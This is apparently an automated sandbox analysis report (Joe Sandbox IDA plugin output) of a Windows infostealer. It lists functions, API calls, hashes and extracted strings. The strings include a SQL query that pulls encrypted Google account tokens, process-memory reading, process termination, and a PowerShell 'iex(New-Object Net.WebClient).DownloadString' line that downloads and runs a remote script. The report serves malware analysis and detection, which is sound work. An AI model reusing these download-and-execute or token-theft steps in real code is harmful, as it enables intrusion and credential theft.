Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D56762
StrCmpCA.SHLWAPI(?), ref: 00D56782
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00D567A3
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D567BE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00D567F4
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00D56824
CloseHandle.KERNEL32(?), ref: 00D5684F
InternetCloseHandle.WININET(00000000), ref: 00D56856
InternetCloseHandle.WININET(?), ref: 00D56862

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 4ad71df99ed64b848717c408c5725a87b779ad3e4e6a840cdf4fb59b354242cc
Instruction ID: 63fcfbcc93a42033a2c034913346c60eb86cf0b4bc507cc369f5187fc7f963b5
Opcode Fuzzy Hash: 4ad71df99ed64b848717c408c5725a87b779ad3e4e6a840cdf4fb59b354242cc
Instruction Fuzzy Hash: BD411CB590012CABDF609F20DC45BDA7BB8FB44315F1044A6BF09A3161D6319E99DFB4

Function 00D77E8D Relevance: 13.6, APIs: 9, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D77EB4
_free.LIBCMT ref: 00D77EC2
_free.LIBCMT ref: 00D77ECD
_free.LIBCMT ref: 00D77EA1

Part of subcall function 00D6F1BB: HeapFree.KERNEL32(00000000,00000000,?,00D6EA05,00000000,00D8C914,00D6EA4C,?,?,?,00D6EB36,00D8C914,?,?,00D804B8,00D8C914), ref: 00D6F1D1
Part of subcall function 00D6F1BB: GetLastError.KERNEL32(?,?,?,00D6EB36,00D8C914,?,?,00D804B8,00D8C914,00D5FF2F,?,?), ref: 00D6F1E3

___free_lc_time.LIBCMT ref: 00D77EEB
_free.LIBCMT ref: 00D77EF6
_free.LIBCMT ref: 00D77F1B
_free.LIBCMT ref: 00D77F32
_free.LIBCMT ref: 00D77F41

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID:
API String ID: 3704779436-0
Opcode ID: 29a10b9a5cfa99f2a51b822062f3862aee9e66b599fd1ae11cf45984c297bdb8
Instruction ID: 8ca5d52532e11a3028ee4eb44f729a3907da58588064435f295db02870242eb7
Opcode Fuzzy Hash: 29a10b9a5cfa99f2a51b822062f3862aee9e66b599fd1ae11cf45984c297bdb8
Instruction Fuzzy Hash: EE119473108B02DBDB20AF74D9C9A5AB7A5EF01350F184C7AF50C97641EB389C418B70

Function 00D61673 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,00D61933,?,00000000,00000000,?,?), ref: 00D61692
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,00D61933,?,00000000,00000000), ref: 00D616BC
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 00D61709
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D61762
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 00D617BA
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00D61933,?,00000000,00000000,?,?), ref: 00D617CB

Strings

@, xrefs: 00D616D5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: 2d5de89e91cf4ae98b005653513cc86a794849c550db83a480493fbc46d11080
Instruction ID: 6f06ff4ca766849e8edee81518a0a9d0438fb744ec37cb93eaf00143fd91fb9f
Opcode Fuzzy Hash: 2d5de89e91cf4ae98b005653513cc86a794849c550db83a480493fbc46d11080
Instruction Fuzzy Hash: 8941AF3AA00209FFDF109FA5DC45AEE7BBAFB44760F188025FA05A6190D774C965DBA0

Function 00D63F47 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D63F51
_memset.LIBCMT ref: 00D63F89
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00D63F9D
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00D63FBA
GetModuleBaseNameA.PSAPI(00000000,?,?,00000104), ref: 00D63FD7
CloseHandle.KERNEL32(00000000), ref: 00D63FDE

Strings

<unknown>, xrefs: 00D63F6D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process$BaseCloseEnumH_prolog3_catch_HandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 445794743-1574992787
Opcode ID: efe58b9cd337a02688208cf83a1c3c723bd508f52385e9861e3296a73c1b525e
Instruction ID: 168fe642ccec6d4356c8737dc662531383ba5e7a87e464e327b0582e004dc3d5
Opcode Fuzzy Hash: efe58b9cd337a02688208cf83a1c3c723bd508f52385e9861e3296a73c1b525e
Instruction Fuzzy Hash: FD11FE7594062DABDB11EF54CC86ADDB678AF09301F4440A1FB08E7251D7705F898FB5

Function 00D590ED Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00D590F2
GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 00D5910E
GetProcAddress.KERNEL32(free_result), ref: 00D59120
FreeLibrary.KERNEL32 ref: 00D5913F

Strings

connect_to_websocket, xrefs: 00D59108
C:\ProgramData\chrome.dll, xrefs: 00D590ED
free_result, xrefs: 00D59110

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 12d2cfe8fa03af6bf05957bd5e18664de596d0bfeb22b017ce08bce45a7736eb
Instruction ID: 0dd967c8f5f280b53aea164c40d0300d6624209143e8eadb1491731e4e3b8cc0
Opcode Fuzzy Hash: 12d2cfe8fa03af6bf05957bd5e18664de596d0bfeb22b017ce08bce45a7736eb
Instruction Fuzzy Hash: 98F03978911B6EDFCB016B31BD18A657AE8B70874AF040076E801D22A4EB708408FFB0

Function 00D5A632 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 222stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

lstrlenA.KERNEL32(?), ref: 00D5A7D7

Part of subcall function 00D63A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

StrStrA.SHLWAPI(00000000,AccountId), ref: 00D5A7F4
lstrlenA.KERNEL32(?,00D87862), ref: 00D5A8A3
lstrlenA.KERNEL32(?), ref: 00D5A8BE

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00D5A746
AccountId, xrefs: 00D5A7EE
GoogleAccounts, xrefs: 00D5A6B5
GoogleAccounts, xrefs: 00D5A65E

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: c52096fdfb05616341879c2568401520dff32d4cac21dd77b4967315a2c4c360
Instruction ID: da1c9d19aeef78d42d94459282d711b7a1fd2582bdffea1ac668c08453ae4832
Opcode Fuzzy Hash: c52096fdfb05616341879c2568401520dff32d4cac21dd77b4967315a2c4c360
Instruction Fuzzy Hash: 6281A032940119ABCF00FBA9DD479EDB774EF09306F510421FD00B7262DB61AE1A9BB1

Function 00D649C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

ShellExecuteEx.SHELL32(?), ref: 00D64B18

Strings

.ps1, xrefs: 00D64A46
C:\ProgramData\, xrefs: 00D649F6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D64AAE
')", xrefs: 00D64A66
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D64A6B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: bc9bf9377f937c87f8dd6e93889a1328353bb31c42c4a303d6ecda5dbf49ac47
Instruction ID: 4bfa3231af97ce3ea9565c940ac1a87e7f7a94ab981ccdaf802098deb830aa55
Opcode Fuzzy Hash: bc9bf9377f937c87f8dd6e93889a1328353bb31c42c4a303d6ecda5dbf49ac47
Instruction Fuzzy Hash: 7941D532D442189BCF10FBA5DC429EDB7B4EF09301F214425B954B7222DB75AB4A8FB0

Function 00D712A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00D712EB
DName::operator+.LIBCMT ref: 00D712F2
DName::DName.LIBCMT ref: 00D71314
DName::operator+.LIBCMT ref: 00D7131B
DName::operator+.LIBCMT ref: 00D71322

Strings

throw(, xrefs: 00D712E3, 00D7130C

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: f1d50e4ea6026bfe8ba07dac360f24d45da090795a8021e128eef8c8831bcf38
Instruction ID: a0bebf6c0ef924aed8e6df2f55e6448a2e2e8c5ed068d0def777e962321f2791
Opcode Fuzzy Hash: f1d50e4ea6026bfe8ba07dac360f24d45da090795a8021e128eef8c8831bcf38
Instruction Fuzzy Hash: 19014434600209EFCF04EBA8D846EED7BB5EB44704F448199F909AB3D1EA70E94587B4

Function 00D644FD Relevance: 10.5, APIs: 7, Instructions: 49processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00D6451F
Process32First.KERNEL32(00000000,00000128), ref: 00D64533
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D64559
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D64568
CloseHandle.KERNEL32(00000000), ref: 00D6456F
Process32Next.KERNEL32(?,00000128), ref: 00D64582
CloseHandle.KERNEL32(?), ref: 00D64592

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 5346f3c9617077532673adc241ab4ee8b4b46af551ee841f239de7b7c6a42a91
Instruction ID: 0c10ce66f1d6b435f0e3c15a0a412f196a0ef086f190e94a5c036c76b0710e93
Opcode Fuzzy Hash: 5346f3c9617077532673adc241ab4ee8b4b46af551ee841f239de7b7c6a42a91
Instruction Fuzzy Hash: 35115E7190222DABDB619F60DC09BE97BB9BF08700F0401A6E506A61A0DB705B90DF61

Function 00D64EA7 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00D64EC6
StrCmpCA.SHLWAPI(00000000,00D87818), ref: 00D64EFF
strtok_s.MSVCRT ref: 00D64FBF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 66714fe6354787a9794361df190fc113dcba8c635ff58abf499705043a1628cd
Instruction ID: 75f0a23764187eaa355913fe5d9589cd53a50d68949f6f2819d6f61e83c572dc
Opcode Fuzzy Hash: 66714fe6354787a9794361df190fc113dcba8c635ff58abf499705043a1628cd
Instruction Fuzzy Hash: 0531D271E05101AFCB149F24DC85B69BBE8FF18719F20545AE905EB192DB38CA508B70

Function 00D593A4 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 105stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

